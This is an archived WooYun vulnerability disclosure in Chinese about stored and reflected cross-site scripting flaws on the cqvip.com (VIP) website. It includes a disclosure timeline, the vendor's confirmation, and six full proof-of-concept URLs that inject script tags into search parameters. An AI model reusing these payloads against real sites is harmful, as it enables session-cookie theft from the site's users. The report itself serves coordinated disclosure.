漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-033353
漏洞标题:维普主站存储型xss可指定用户进行攻击
相关厂商:维普网
漏洞作者: Lxai
提交时间:2013-08-05 18:55
修复时间:2013-09-19 18:55
公开时间:2013-09-19 18:55
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:6
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-05: 细节已通知厂商并且等待厂商处理中
2013-08-09: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向核心白帽子及相关领域专家公开
2013-08-29: 细节向普通白帽子公开
2013-09-08: 细节向实习白帽子公开
2013-09-19: 细节向公众公开
简要描述:
维普网短消息处未任何过滤导致xss
详细说明:
注册维普网的账号 然后发短消息 第一是没做限制可以发给自己 第二是代码可以执行
------------------------------------------------
问题出在发短消息上。
写新短信
然后全部填上就发送 看到邮件的时候cookie已经盗过来了
收件人写目标 我这里写我自己的 也没限制不能发我自己 这也是一个小问题
标题和内容就写xss代码吧
还有个是在http://bbs.cqvip.com/ 的短消息 虽然javascript的代码不执行
但是可以执行html的
最后还有几个反射性xss
http://2010.cqvip.com:80/asp/vipsearch.asp?Type=M&Query=%C3%F1%D3%AA%C6%F3%D2%B5")><script>alert(42873);</sCript>
http://service.cqvip.com/search.asp?txt=%3Cscript%3Ealert(1)%3C/script%3E
http://ipub.cqvip.com/main/search.aspx?k=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://www.cqvip.com/zuozhekj/search.aspx?st=t&sv=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://train.cqvip.com/search.asp?province=%B3%C7%CA%D0&trade=%C0%E0%B1%F0&t=%3C%2Ftitle%3E%3Cscript%3Ealert%28123321%29%3C%2Fscript%3E%3Ctitle%3E&submit=%C5%E0%D1%B5%CB%D1%CB%F7&pid=&iid=
http://expo.cqvip.com/search.asp?province=%CA%A1%B7%DD&city=%B3%C7%CA%D0&trade=%D0%D0%D2%B5&ts=&te=&t=%3Cscript%3Ealert%281111%29%3C%2Fscript%3E&submit=%CB%D1%CB%F7&pid=&cid=&iid=&tid=
漏洞证明:
修复方案:
你们专业
版权声明:转载请注明来源 Lxai@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-08-09 22:15
厂商回复:
最新状态:
暂无